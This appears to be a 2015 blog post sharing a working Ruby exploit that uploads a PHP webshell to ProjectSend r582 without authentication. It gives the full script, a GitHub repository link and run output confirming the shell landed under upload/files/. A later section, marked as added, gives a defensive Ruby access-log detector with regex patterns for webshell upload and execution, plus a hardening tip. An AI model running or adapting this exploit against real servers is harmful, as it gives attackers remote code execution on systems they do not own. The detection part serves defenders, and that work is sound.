[WEB HACKING] ProjectSend R582 WebShell Vulnerability (Exploit) [ZERODAY?]

Author 하훌
Date and Time 7/07/2015
License Creative Commons License


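While recently analyzing a framework called ProjectSend, I found a vulnerability that allows a webshell to be uploaded and submitted it to Exploit-db, but..
it turned out to be a vulnerability that had already been posted =_= .. I was so pleased that I wrote the script and sent it off right away, without thinking to check first..

Still, it is written simply in Ruby and is usable, so I am sharing it through the blog.

It is a zero-day that works even on r582, the current latest version.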

GIT Repo

https://github.com/hahwul/ProjectSend_r582_webshell.git
 + https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
 + https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
# git clone https://github.com/hahwul/ProjectSend_r582_webshell.git


Source Code

ProjectSend_r582_webshell.rb
# --------------------------------------------------------------------
# Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
# Date: 2015-07-01
# Exploit Author: hahwul
# Blog: http://www.codeblack.net
# Vendor Homepage: http://www.projectsend.org
# Software Link: http://www.projectsend.org/download/108/
# Version: ProjectSend-r582
# Tested on: debian [wheezy]
# CVE : none
# --------------------------------------------------------------------

require "net/http"
require "uri"
require "net/http/post/multipart"

if ARGV.length != 2

puts "ProjectSend r582ver Webshell Upload"
puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
puts "  targetURL(ex): http://127.0.0.1/vul_test/ps"
puts "  ShellFile(ex): MyShell.php"
puts "  Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
puts "  Include Gem : gem install multipart-post"
puts "  exploit & code by hahwul[www.codeblack.net]"

else

target_url = ARGV[0]    # http://127.0.0.1/ps/
shell_name = ARGV[1]    # myshell.php
exp_url = target_url + "/process-upload.php"

uri = URI.parse(exp_url)
http = Net::HTTP.new(uri.host, uri.port)

multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
multipartParams = multipartParams.merge({"name"=>"shell.php"})
request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
request["Cache-Control"] = "no-cache"
request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
request["Accept-Encoding"] = "gzip, deflate"
request["Pragma"] = "no-cache"
response = http.request(request)

puts "Target: "+uri.host+uri.path
puts "Exploit..."
puts "Status code: "+response.code
puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name

end


Execute & Result 

# ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php
Target: 127.0.0.1/vul_test/ps/process-upload.php
Exploit...
Status code: 302
Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php

Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php
WEBSHELL UPLOAD
total 12
drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 .
drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 ..
-rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php
-rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php
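
Detection (added example)

For defenders, the sequence shown above (a POST to process-upload.php followed by a request for a PHP file under upload/files/) is visible in the web server access log. The following Ruby check is an added example, not part of the original post or the author's repository; the combined log format, the list of script extensions, the function name and the sample log lines are assumptions constructed for illustration.

```ruby
require "set"

# Paths taken from the PoC on this page; the extension list is an assumption
# about which suffixes the web server hands to the PHP interpreter.
UPLOAD_ENDPOINT   = %r{/process-upload\.php\z}
SCRIPT_IN_UPLOADS = %r{/upload/files/[^/]+\.(?:php\d?|phtml|phar)(?:/|\z)}i
# Apache/nginx "combined" access log format (assumed).
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) /

# Returns one finding per request for a script under upload/files/.
# :correlated is true when the same client POSTed to process-upload.php earlier.
def find_webshell_activity(lines)
  uploaders = Set.new
  findings  = []
  lines.each do |line|
    m = LOG_LINE.match(line)
    next unless m                              # skip lines that do not parse
    path = m[:target].split("?", 2).first      # drop the query string
    if m[:verb] == "POST" && path.match?(UPLOAD_ENDPOINT)
      uploaders << m[:ip]
    elsif path.match?(SCRIPT_IN_UPLOADS)
      findings << { ip: m[:ip], time: m[:ts], path: path,
                    status: m[:status].to_i, correlated: uploaders.include?(m[:ip]) }
    end
  end
  findings
end

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = <<~LOG.lines.map(&:chomp)
  203.0.113.7 - - [01/Jul/2015:01:21:03 +0900] "POST /ps/process-upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [01/Jul/2015:01:21:09 +0900] "GET /ps/upload/files/shell.php?a=1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
  198.51.100.4 - - [01/Jul/2015:01:30:00 +0900] "GET /ps/upload/files/report.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
  198.51.100.9 - - [01/Jul/2015:02:02:41 +0900] "GET /ps/upload/files/x.PHP5/a HTTP/1.1" 404 0 "-" "curl/7.38"
LOG

if __FILE__ == $PROGRAM_NAME
  find_webshell_activity(SAMPLE_LOG).each do |f|
    tag = f[:correlated] ? "upload+execute" : "script request"
    puts "#{tag}: #{f[:ip]} #{f[:path]} -> #{f[:status]} at #{f[:time]}"
  end
end
```

A correlated hit with status 200 means the server served or ran a script that the same client had just uploaded. Configuring the web server not to execute scripts under upload/files/ removes that impact even when the upload itself succeeds.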
